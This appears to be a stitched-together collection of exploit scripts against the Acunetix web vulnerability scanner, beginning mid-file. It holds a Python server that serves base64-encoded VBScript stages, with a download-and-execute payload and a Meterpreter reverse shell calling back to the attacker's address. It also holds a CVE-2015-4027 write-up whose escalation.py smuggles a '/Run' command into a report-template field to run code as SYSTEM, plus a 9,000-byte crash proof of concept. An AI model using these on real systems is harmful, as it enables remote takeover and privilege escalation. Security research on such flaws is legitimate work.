"mZjE7DQogIG1hcmdpbjogMHB4IGF1dG87DQogIHBhZGRpbmctdG9wOiAyMHB4Ow0KICBib3JkZXItcmFkaXVzOiAxMHB4Ow0KICAtbW" \
"96LWJvcmRlci1yYWRpdXM6IDEwcHg7DQogIC13ZWJraXQtYm9yZGVyLXJhZGl1czogMTBweDsNCn0NCg0KaW5wdXRbdHlwZT0idGV4d" \
"CJdew0KICBkaXNwbGF5OiBibG9jazsNCiAgd2lkdGg6IDMwOXB4Ow0KICBoZWlnaHQ6IDM1cHg7DQogIG1hcmdpbjogMTVweCBhdXRv" \
"Ow0KICBiYWNrZ3JvdW5kOiAjZmZmOw0KICBib3JkZXI6IDBweDsNCiAgcGFkZGluZzogNXB4Ow0KICBmb250LXNpemU6IDE2cHg7DQo" \
"gICBib3JkZXI6IDJweCBzb2xpZCAjZmZmOw0KICB0cmFuc2l0aW9uOiBhbGwgMC4zcyBlYXNlOw0KICBib3JkZXItcmFkaXVzOiA1cH" \
"g7DQogIC1tb3otYm9yZGVyLXJhZGl1czogNXB4Ow0KICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDVweDsNCn0NCg0KaW5wdXRbdHlwZ" \
"T0idGV4dCJdOmZvY3Vzew0KICBib3JkZXI6IDJweCBzb2xpZCAjMWFiYzlkDQp9DQoNCmlucHV0W3R5cGU9InN1Ym1pdCJdew0KICBk" \
"aXNwbGF5OiBibG9jazsNCiAgYmFja2dyb3VuZDogIzFhYmM5ZDsNCiAgd2lkdGg6IDMxNHB4Ow0KICBwYWRkaW5nOiAxMnB4Ow0KICB" \
"jdXJzb3I6IHBvaW50ZXI7DQogIGNvbG9yOiAjZmZmOw0KICBib3JkZXI6IDBweDsNCiAgbWFyZ2luOiBhdXRvOw0KICBib3JkZXItcm" \
"FkaXVzOiA1cHg7DQogIC1tb3otYm9yZGVyLXJhZGl1czogNXB4Ow0KICAtd2Via2l0LWJvcmRlci1yYWRpdXM6IDVweDsNCiAgZm9u" \
"dC1zaXplOiAxN3B4Ow0KICB0cmFuc2l0aW9uOiBhbGwgMC4zcyBlYXNlOw0KfQ0KDQppbnB1dFt0eXBlPSJzdWJtaXQiXTpob3ZlcnsN" \
"CiAgYmFja2dyb3VuZDogIzA5Y2NhNg0KfQ0KDQphew0KICB0ZXh0LWFsaWduOiBjZW50ZXI7DQogIGZvbnQtZmFtaWx5OiBBcmlhbDs" \
"NCiAgY29sb3I6IGdyYXk7DQogIGRpc3BsYXk6IGJsb2NrOw0KICBtYXJnaW46IDE1cHggYXV0bzsNCiAgdGV4dC1kZWNvcmF0aW9uOi" \
"Bub25lOw0KICB0cmFuc2l0aW9uOiBhbGwgMC4zcyBlYXNlOw0KICBmb250LXNpemU6IDEycHg7DQp9DQoNCmE6aG92ZXJ7DQogIGNvb" \
"G9yOiAjMWFiYzlkOw0KfQ0KDQoNCjo6LXdlYmtpdC1pbnB1dC1wbGFjZWhvbGRlciB7DQogICBjb2xvcjogZ3JheTsNCn0NCg0KOi1" \
"tb3otcGxhY2Vob2xkZXIgeyAvKiBGaXJlZm94IDE4LSAqLw0KICAgY29sb3I6IGdyYXk7ICANCn0NCg0KOjotbW96LXBsYWNlaG9sZG" \
"VyIHsgIC8qIEZpcmVmb3ggMTkrICovDQogICBjb2xvcjogZ3JheTsgIA0KfQ0KDQo6LW1zLWlucHV0LXBsYWNlaG9sZGVyIHsgIA0KI" \
"CAgY29sb3I6IGdyYXk7ICANCn0NCjwvc3R5bGU+DQo8aDE+QWRtaW4gcGFuZWw8L2gxPg0KPGRpdiBjbGFzcz0ic3RhbmQiPg0KICA8" \
"ZGl2IGNsYXNzPSJvdXRlci1zY3JlZW4iPg0KICAgIDxkaXYgY2xhc3M9ImlubmVyLXNjcmVlbiI+DQogICAgICA8ZGl2IGNsYXNzPSJ" \
"mb3JtIj4NCiAgICAgIDxmb3JtIG1ldGhvZD0icG9zdCIgYWN0aW9uPSIvbG9naW4iPg0KICAgICAgICA8aW5wdXQgdHlwZT0idGV4dC" \
"IgbmFtZT0idXNyIiBwbGFjZWhvbGRlcj0iVXNlcm5hbWUiIC8+DQogICAgICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJwd2QiI" \
"HBsYWNlaG9sZGVyPSJQYXNzd29yZCIgLz4NCiAgICAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJMb2dpbiIgLz4NCiAg" \
"ICAgICAgIDwvZm9ybT4NCiAgICAgICAgPGEgaHJlZj0iL2ZvcmdvdCI+TG9zdCB5b3VyIHBhc3N3b3JkPzwvYT4NCiAgICAgIDwvZGl" \
"2PiANCiAgICA8L2Rpdj4gDQogIDwvZGl2PiANCjwvZGl2Pg=="
# param NO
EXPLOIT_STAGE_2 = "U2V0IGZzbyA9IENyZWF0ZU9iamVjdCgiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3QiKQ0KRnVuY3Rpb24gRXNjYWxhdGVBbm" \
"RFeGVjdXRlKCkNCiAgYmluZCA9ICJTZXQgb2JqID0gQ3JlYXRlT2JqZWN0KCIiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3Q" \
"iIikiICYgdmJjcmxmICZfDQogICJvYmouRGVsZXRlRmlsZSgiIkM6XFByb2dyYW1EYXRhXEFjdW5ldGl4IFdWUyAxMFxEYXRhX" \
"FNjcmlwdHNcUGVyU2VydmVyXEFKUF9BdWRpdC5zY3JpcHQiIikiICYgdmJjcmxmICZfDQogICAib2JqLk1vdmVGaWxlICIiQzp" \
"cUHJvZ3JhbURhdGFcQWN1bmV0aXggV1ZTIDEwXERhdGFcU2NyaXB0c1xQZXJTZXJ2ZXJcQUpQX0F1ZGl0LnNjcmlwdC5iYWsiI" \
"iwgIiJDOlxQcm9ncmFtRGF0YVxBY3VuZXRpeCBXVlMgMTBcRGF0YVxTY3JpcHRzXFBlclNlcnZlclxBSlBfQXVkaXQuc2NyaXB" \
"0IiIgIiAmIHZiY3JsZiAmXw0KICAiRnVuY3Rpb24gUkVPbnJZSmUoKSIgJiB2YmNybGYgJl8NCiAgIk5tU1ROUFVyb0lLdFRxID" \
"0gIiIlcyIiIiAmIHZiY3JsZiAmXw0KICAiRGltIGdVdERzem1uR050IiAmIHZiQ3JsZiAmXw0KICAiU2V0IGdVdERzem1uR050I" \
"D0gQ3JlYXRlT2JqZWN0KCIiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3QiIikiICYgdmJjcmxmICZfDQogICJEaW0gaE1XRkN" \
"6dUciICYgdmJjcmxmICZfDQogICJEaW0gZXJtbVRDalJ4SWpjWEciICYgdmJjcmxmICZfDQogICJEaW0ga0xrdVdOYnhuTFVIe" \
"HR6IiAmIHZiY3JsZiAmXw0KICAiRGltIHJDUWNUekFBalJ4dSIgJiB2YmNybGYgJl8NCiAgIlNldCBlcm1tVENqUnhJamNYRyA" \
"9IGdVdERzem1uR050LkdldFNwZWNpYWxGb2xkZXIoMikiICYgdmJjcmxmICZfDQogICJyQ1FjVHpBQWpSeHUgPSBlcm1tVENqU" \
"nhJamNYRyAmICIiXCIiICYgZ1V0RHN6bW5HTnQuR2V0VGVtcE5hbWUoKSIgJiB2YmNybGYgJl8NCiAgImdVdERzem1uR050LkN" \
"yZWF0ZUZvbGRlcihyQ1FjVHpBQWpSeHUpIiAmIHZiY3JsZiAmXw0KICAia0xrdVdOYnhuTFVIeHR6ID0gckNRY1R6QUFqUnh1I" \
"CYgIiJcIiIgJiAiIk5ObWxmVmhqYld3emNqLmV4ZSIiIiAmIHZiY3JsZiAmXw0KICAiU2V0IGhNV0ZDenVHID0gZ1V0RHN6bW5" \
"HTnQuQ3JlYXRlVGV4dEZpbGUoa0xrdVdOYnhuTFVIeHR6LCB0cnVlICwgZmFsc2UpICIgJiB2YmNybGYgJl8NCiAgIkZvciBpI" \
"D0gMSB0byBMZW4oTm1TVE5QVXJvSUt0VHEpIFN0ZXAgMiIgJiB2YmNybGYgJl8NCiAgIiAgICBoTVdGQ3p1Ry5Xcml0ZSBDaHI" \
"oQ0xuZygiIiZIIiIgJiBNaWQoTm1TVE5QVXJvSUt0VHEsaSwyKSkpIiAmIHZiY3JsZiAmXw0KICAiTmV4dCIgJiB2YmNybGYgJ" \
"l8NCiAgImhNV0ZDenVHLkNsb3NlIiAmIHZiY3JsZiAmXw0KICAiRGltIHlFU3pGdUlNb211IiAmIHZiY3JsZiAmXw0KICAiU2V" \
"0IHlFU3pGdUlNb211ID0gQ3JlYXRlT2JqZWN0KCIiV3NjcmlwdC5TaGVsbCIiKSIgJiB2YmNybGYgJl8NCiAgInlFU3pGdUlNb" \
"211LnJ1biBrTGt1V05ieG5MVUh4dHoiICYgdmJjcmxmICZfDQogICInZ1V0RHN6bW5HTnQuRGVsZXRlRmlsZShrTGt1V05ieG5" \
"MVUh4dHopIiAmIHZiY3JsZiAmXw0KICAiJ2dVdERzem1uR050LkRlbGV0ZUZvbGRlcihyQ1FjVHpBQWpSeHUpIiAmIHZiY3JsZ" \
"iAmXw0KIkVuZCBGdW5jdGlvbiIgJiB2YmNybGYgJl8NCiJSRU9ucllKZSIgJiB2YmNybGYgJl8NCiJDcmVhdGVPYmplY3QoIiJ" \
"TY3JpcHRpbmcuRmlsZVN5c3RlbU9iamVjdCIiKS5EZWxldGVGaWxlIFdTY3JpcHQuU2NyaXB0RnVsbE5hbWUiICYgdmJjcmxmI" \
"CZfDQoiV1NjcmlwdC5RdWl0Ig0KICBjd2QgPSBDcmVhdGVPYmplY3QoIldTY3JpcHQuU2hlbGwiKS5FeHBhbmRFbnZpcm9ubWV" \
"udFN0cmluZ3MoIiVzIikgJiAiXHN0YWdlbGFzdC52YnMiDQogIFNldCBvYmpGaWxlQmluZCA9IGZzby5DcmVhdGVUZXh0RmlsZS" \
"hjd2QgLFRydWUpDQogIG9iakZpbGVCaW5kLldyaXRlIGJpbmQgJiB2YkNyTGYNCiAgb2JqRmlsZUJpbmQuQ2xvc2UNCiAgDQog" \
"IGpzID0gInZhciBzaGVsbCA9IG5ldyBBY3RpdmVYT2JqZWN0KCIiV1NjcmlwdC5TaGVsbCIiKTsiJiB2YmNybGYgJiAic2hlbG" \
"wucnVuKCdjbWQgL0Mgc3RhcnQgL0IgIiIiIiAiInBvd2Vyc2hlbGwiIiAtd2luZG93c3R5bGUgaGlkZGVuIC1jb21tYW5kICIi" \
"d3NjcmlwdCAiICYgUmVwbGFjZShjd2QsIlwiLCJcXCIpICYgIiIiJyk7Ig0KICBmc28uTW92ZUZpbGUgIkM6XFByb2dyYW1EYX" \
"RhXEFjdW5ldGl4IFdWUyAxMFxEYXRhXFNjcmlwdHNcUGVyU2VydmVyXEFKUF9BdWRpdC5zY3JpcHQiLCAiQzpcUHJvZ3JhbURh" \
"dGFcQWN1bmV0aXggV1ZTIDEwXERhdGFcU2NyaXB0c1xQZXJTZXJ2ZXJcQUpQX0F1ZGl0LnNjcmlwdC5iYWsiDQogIFNldCBvYm" \
"pGaWxlID0gZnNvLkNyZWF0ZVRleHRGaWxlKCJDOlxQcm9ncmFtRGF0YVxBY3VuZXRpeCBXVlMgMTBcRGF0YVxTY3JpcHRzXFBl" \
"clNlcnZlclxBSlBfQXVkaXQuc2NyaXB0IixUcnVlKQ0KICBvYmpGaWxlLldyaXRlIGpzICYgdmJDckxmDQogIG9iakZpbGUuQ2" \
"xvc2UNCiAgeSA9IE1vbnRoKE5vdykgJiAiLyIgJiBEYXkoTm93KSAmICIvIiAmIFllYXIoTm93KQ0KICBoID0gSG91cihOb3cp" \
"ICYgIjoiJiBNaW51dGUoTm93KSsxDQogIHNSZXF1ZXN0ID0gInsiInNjYW5UeXBlIiI6IiJzY2FuIiIsIiJ0YXJnZXRMaXN0Ii" \
"I6IiIiIiwiInRhcmdldCIiOlsiImh0dHA6Ly93d3cuZ29vZ2xlLml0IiJdLCIicmVjdXJzZSIiOiIiLTEiIiwiImRhdGUiIjoi" \
"IiIgJiB5ICYgIiIiLCIiZGF5T2ZXZWVrIiI6IiIxIiIsIiJkYXlPZk1vbnRoIiI6IiIxIiIsIiJ0aW1lIiI6IiIiICYgaCAmIC" \
"IiIiwiImRlbGV0ZUFmdGVyQ29tcGxldGlvbiIiOiIiRmFsc2UiIiwiInBhcmFtcyIiOnsiInByb2ZpbGUiIjoiIkRlZmF1bHQi" \
"IiwiImxvZ2luU2VxIiI6IiI8bm9uZT4iIiwiInNldHRpbmdzIiI6IiJEZWZhdWx0IiIsIiJzY2FubmluZ21vZGUiIjoiImhldX" \
"Jpc3RpYyIiLCIiZXhjbHVkZWRob3VycyIiOiIiPG5vbmU+IiIsIiJzYXZldG9kYXRhYmFzZSIiOiIiVHJ1ZSIiLCIic2F2ZWxv" \
"Z3MiIjoiIkZhbHNlIiIsIiJnZW5lcmF0ZXJlcG9ydCIiOiIiRmFsc2UiIiwiInJlcG9ydGZvcm1hdCIiOiIiUERGIiIsIiJyZX" \
"BvcnR0ZW1wbGF0ZSIiOiIiV1ZTRGV2ZWxvcGVyUmVwb3J0LnJlcCIiLCIiZW1haWxhZGRyZXNzIiI6IiIiIn19Ig0KICBzZXQg" \
"b0hUVFAgPSBDcmVhdGVPYmplY3QoIk1pY3Jvc29mdC5YTUxIVFRQIikNCiAgb0hUVFAub3BlbiAiUE9TVCIsICJodHRwOi8vMT" \
"I3LjAuMC4xOjgxODMvYXBpL2FkZFNjYW4iLCBmYWxzZQ0KICBvSFRUUC5zZXRSZXF1ZXN0SGVhZGVyICJDb250ZW50LVR5cGUi" \
"LCAiYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkIg0KICBvSFRUUC5zZXRSZXF1ZXN0SGVhZGVyICJYLVJlcXVlc3" \
"RlZC1XaXRoIiwgIlhNTEh0dHBSZXF1ZXN0Ig0KICBvSFRUUC5zZXRSZXF1ZXN0SGVhZGVyICJBY2NlcHQiLCAiYXBwbGljYXRp" \
"b24vanNvbiwgdGV4dC9qYXZhc2NyaXB0LCAqLyo7IHE9MC4wMSINCiAgb0hUVFAuc2V0UmVxdWVzdEhlYWRlciAiQ29udGVudC" \
"1UeXBlIiwgImFwcGxpY2F0aW9uL2pzb247IGNoYXJzZXQ9VVRGLTgiDQogIG9IVFRQLnNldFJlcXVlc3RIZWFkZXIgIlJlcXVl" \
"c3RWYWxpZGF0ZWQiLCAgInRydWUiDQogIG9IVFRQLnNldFJlcXVlc3RIZWFkZXIgIkNvbnRlbnQtTGVuZ3RoIiwgTGVuKHNSZX" \
"F1ZXN0KQ0KICBvSFRUUC5zZW5kIHNSZXF1ZXN0DQogRW5kIEZ1bmN0aW9uDQogDQogRXNjYWxhdGVBbmRFeGVjdXRlDQogZnNv" \
"LkRlbGV0ZUZpbGUgV1NjcmlwdC5TY3JpcHRGdWxsTmFtZQ0KIFdTY3JpcHQuUXVpdA=="
class myHandler(BaseHTTPRequestHandler):
timeout = 5
server_version = "Apache"
sys_version = "1.2"
def log_message(self, format, *args):
try:
paths = str(list(args)[0])
if "prompt" in paths or "confirm" in paths or "alert" in paths:
print "[*] Triggering EXPLOIT_STAGE_1 + PAYLOAD_DOWNLOAD_EXEC sending (%s) bytes !" % \
(len(PAYLOAD_DOWNLOAD_EXEC) + len(EXPLOIT_STAGE_1))
if "stage2" in paths:
print "[*] Triggering EXPLOIT_STAGE_2 sending (%s) bytes !" % len(EXPLOIT_STAGE_2)
return
except:
pass
return
def do_POST(self):
PDE = base64.b64decode(PAYLOAD_DOWNLOAD_EXEC) % (sys.argv[2] + ":" + sys.argv[1],
"%TEMP%", gen_random_name(12))
data = self.rfile.read(int(self.headers.getheader("Content-Length")))
data = data.split("&")
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
for param in data:
if "usr" in param:
param = param.split("=")[1]
self.wfile.write(base64.b64decode(EXPLOIT_STAGE_1)
% (base64.b64encode("".join(x + "\x00" for x in PDE)),
("Bad password for user %s , <a href=\"/\">try again</a>." % param)))
return
self.wfile.write(base64.b64decode(EXPLOIT_STAGE_1)
% (base64.b64encode("".join(x + "\x00" for x in PDE)),
"Some data are missing , <a href=\"/\">try again</a>."))
return
def do_GET(self):
try:
if self.path == "/":
self.send_response(302)
self.send_header('Content-type', 'text/html')
self.send_header('Location', "login")
self.end_headers()
# Send the html message
self.wfile.write("<a href='/?url=test'>Here</a>")
return
elif self.path == "/stage2":
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
# Send the html message
self.wfile.write(base64.b64decode(EXPLOIT_STAGE_2)
% (PAYLOAD_METERPETRER % ip2b(sys.argv[2]), "%TEMP%"))
postexpthread = Thread(target=postexploitation, args=(self.client_address[0], ))
postexpthread.start()
return
else:
string = ""
try:
string = self.path.split("=")[1]
except:
pass
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
# Send the html message
PDE = base64.b64decode(PAYLOAD_DOWNLOAD_EXEC) % (sys.argv[2] + ":" + sys.argv[1],
"%TEMP%", gen_random_name(12))
self.wfile.write(base64.b64decode(EXPLOIT_STAGE_1)
% (base64.b64encode("".join(x + "\x00" for x in PDE)), base64.b64decode(LOGIN_FORM)))
return
except Exception as e:
print e.message
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write("")
return
if __name__ == "__main__":
print "\n\nAcunetix WVS 10 - SYSTEM Remote Command Execution (Daniele Linguaglossa)\n" \
"Payload: Meterpreter reverse TCP 4444"
try:
if len(sys.argv) > 2:
# Create a web server and define the handler to manage the
# incoming request
server = HTTPServer(('0.0.0.0', int(sys.argv[1])), myHandler)
print 'Exploit started on port *:%s' % sys.argv[1]
print '[+] Waiting for scanner...'
# Wait forever for incoming http requests
server.serve_forever()
else:
print "Usage: %s <port> <local ip/domain name>" % os.path.basename(sys.argv[0])
except KeyboardInterrupt:
print '^C received, shutting down the web server'
server.socket.close()
'''
========================================================================
Acunetix WVS 10 - from guest to Sytem (Local privilege escalation)
CVE: CVE-2015-4027
Author: (me) Daniele Linguaglossa
Affected Product: Acunetix WVS 10
Exploit: Local privilege escalation
Vendor: Acunetix ltd
Remote: No
Version: 10
=========================================================================
A local privilege escalation exists in Acunetix WVS 10, it allow
a local user (even guest) to gain same privilege as System user.
With default Acunetix installation, a service called "AcuWVSSchedulerv10"
will be installed, this service run as local system user.
AcuWVSSchedulerv10 is reponsable for scan scheduling without user interaction
it expose some API to interact via a web server usually localhost:8183.
API:
/listScan
/addScan <== vulnerable one
/deleteScan
etc...
When a user schedule a scan API "addScan" will be called as following
-------------------------------------------------------------------------------
POST /api/addScan HTTP/1.1
Host: localhost:8183
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
RequestValidated: true
X-Requested-With: XMLHttpRequest
Referer: http://localhost:8183/
Content-Length: 452
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{
"scanType": "scan",
"targetList": "",
"target": ["http://.target.it"],
"recurse": "-1",
"date": "12/2/2015",
"dayOfWeek": "1",
"dayOfMonth": "1",
"time": "12:21",
"deleteAfterCompletion": "False",
"params": {
"profile": "Default",
"loginSeq": "<none>",
"settings": "Default",
"scanningmode": "heuristic",
"excludedhours": "<none>",
"savetodatabase": "True",
"savelogs": "False",
"generatereport": "False",
"reportformat": "PDF",
"reporttemplate": "WVSAffectedItemsReport.rep",
"emailaddress": ""
}
}
------------------------------------------------------------------------------
The first thing i noticed was the reporttemplate, this was used to create report
when scanning ends, so it means an external file wich we can control will be then
used by System! this would be interesting enough but i never look deep into.
Instead i noticed something even worst, filename was used as argument to wvs.exe
called with system privilege!
By looking at how Acunetix handled reporttemplate argument i figured out that was
possibile to inject custom arguments within reporttemplate, now this is where
Acunetix help us :D in fact wvs was provided with an interesting argument it was
/Run as reference says:
https://www.acunetix.com/blog/docs/acunetix-wvs-cli-operation/
Run a command line command during the crawl.
Syntax: /Run [command]
Example: /Run curl http://example.com/dir1/
Wow that's really nice, so in order to execute a command we must insert a fake
Crawl followed by a Run command so reporttemplate become:
"reporttemplate": "WVSAffectedItemsReport.rep /Craw http://fakesite.it /Run cmd.exe"
it worked cmd runned as System!
==================================================================================
Now let's pwn this!
escalation.py
'''
import httplib
import json
from datetime import datetime
import sys
from time import gmtime, strftime
COMMAND = sys.argv[1] if len(sys.argv) > 1 else "cmd.exe"
ACUHOST = '127.0.0.1'
ACUPORT = 8183
ACUHEADERS = {
"Content-Type": "application/json; charset=UTF-8",
"X-Requested-With": "XMLHttpRequest",
"Accept": "application/json, text/javascript, */*; q=0.01",
"RequestValidated": "true"
}
ACUEXPLOIT = "/Crawl http://www.google.it /Run \""+ COMMAND + "\""
ACUDATA = {"scanType":"scan",
"targetList":"",
"target":["http://"+"A"*2048],
"recurse":"-1",
"date":strftime("%m/%d/%Y", gmtime()),
"dayOfWeek":"1",
"dayOfMonth":"1",
"time": "%s:%s" % (datetime.now().hour, datetime.now().minute+1),
"deleteAfterCompletion":"False",
"params":{"profile":"Default",
"loginSeq":"<none>",
"settings":"Default",
"scanningmode":"heuristic",
"excludedhours":"<none>",
"savetodatabase":"True",
"savelogs":"False",
"generatereport":"False",
"reportformat":"PDF",
"reporttemplate":"WVSDeveloperReport.rep " + ACUEXPLOIT,
"emailaddress":""}
}
def sendExploit():
conn = httplib.HTTPConnection(ACUHOST, ACUPORT)
conn.request("POST", "/api/addScan", json.dumps(ACUDATA), ACUHEADERS)
resp = conn.getresponse()
return "%s %s" % (resp.status, resp.reason)
print "Acunetix Wvs 10 Local priviledge escalation by Daniele Linguaglossa\n"
print "[+] Command : %s will be executed as SYSTEM" % COMMAND
print "[+] Sending exploit..."
print "[+] Result: "+sendExploit()
print "[+] Done!"
'''
============================================================================
I hope this write-up was funny enough anyway i really would like to thank
Acunetix product manager N.S. for the really fast answer and bug mitigation,
right now a patch exists so hurry up download it now.
============================================================================
'''
#!/usr/bin/env python
# Title : Acunetix Web Vulnerability Scanner 9.5 - Crash Proof Of Concept
# Website : https://www.acunetix.com
# Tested : win 7 / win 8.1 / win vista
#
#
# Author : Hadi Zomorodi Monavar
# Email : zomorodihadi@gmail.com
#
# 1 . run python code : python poc.py
# 2 . open hadi.txt and copy content to clipboard
# 3 . open "Acunetix Web Vulnerability Scanner 9.5"
# 4 . from Tools Explorer --> subdomain scanner
# 5 . Paste ClipBoard on "Domain"
# 6 . Click start
# 7 . Crashed ;)
crash = "\x41"*9000 #B0F
file = open("hadi.txt", "w")
file.write(crash)
file.close()